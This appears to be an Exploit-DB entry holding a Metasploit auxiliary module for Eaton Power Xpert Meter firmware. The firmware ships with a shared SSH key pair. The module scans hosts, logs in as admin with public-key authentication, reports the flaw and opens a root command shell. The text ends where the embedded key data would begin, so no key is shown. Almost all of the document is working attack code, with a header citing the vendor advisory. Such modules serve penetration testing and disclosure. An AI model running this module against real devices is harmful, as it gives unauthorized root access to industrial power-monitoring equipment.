# Exploit Title: Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure # Date: 2018-07-16 # WebPage: https://CTRLu.net/ # Vendor Homepage: http://www.eaton.com/ # Vendor Advisory: http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf # Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2 # Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted # Recomended to update to Version 13.4.0.10 or above # Tested on: Firmware 12.1.9.1 and 13.3.2.10 # CVE : N/A # XXX: This shouldn't be necessary but is now require 'net/ssh/command_stream' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SSH include Msf::Auxiliary::Scanner include Msf::Auxiliary::CommandShell include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'Eaton Xpert Meter SSH Private Key Exposure Scanner', 'Description' => %q{ Eaton Power Xpert Meters are used across industries for energy management, monitoring circuit loading, and identifying power quality problems. Meters running firmware 12.x.x.x or below version 13.3.x.x and below ship with a public/private key pair on Power Xpert Meter hardware that allows passwordless authentication to any other affected Power Xpert Meter. The vendor recommends updating to Version 13.4.0.10 or above. As the key is easily retrievable, an attacker can use it to gain unauthorized remote access as uid0 }, 'Author' => [ 'BrianWGray' ], 'References' => [ ['URL', 'http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'], ['URL', 'https://www.ctrlu.net/vuln/0006.html'] ], 'DisclosureDate' => 'Jul 18 2018', 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(22) ]) register_advanced_options([ OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) ]) end def run_host(ip) factory = ssh_socket_factory ssh_opts = { auth_methods: ['publickey'], port: rport, key_data: [ key_data ], hmac: ['hmac-sha1'], encryption: ['aes128-cbc'], kex: ['diffie-hellman-group1-sha1'], host_key: ['ssh-rsa'], use_agent: false, config: false, proxy: factory } ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(ip, 'admin', ssh_opts) end rescue Net::SSH::Exception => e vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}") return end return unless ssh print_good("#{ip}:#{rport} - Logged in as admin") version = ssh.transport.server_version.version report_vuln( host: ip, name: self.name, refs: self.references, info: version ) shell = Net::SSH::CommandStream.new(ssh) return unless shell info = "Eaton Xpert Meter SSH Backdoor (#{version})" ds_merge = { 'USERNAME' => 'admin' } start_session(self, info, ds_merge, false, shell.lsock) # XXX: Ruby segfaults if we don't remove the SSH socket remove_socket(ssh.transport.socket) end def rport datastore['RPORT'] end def key_data <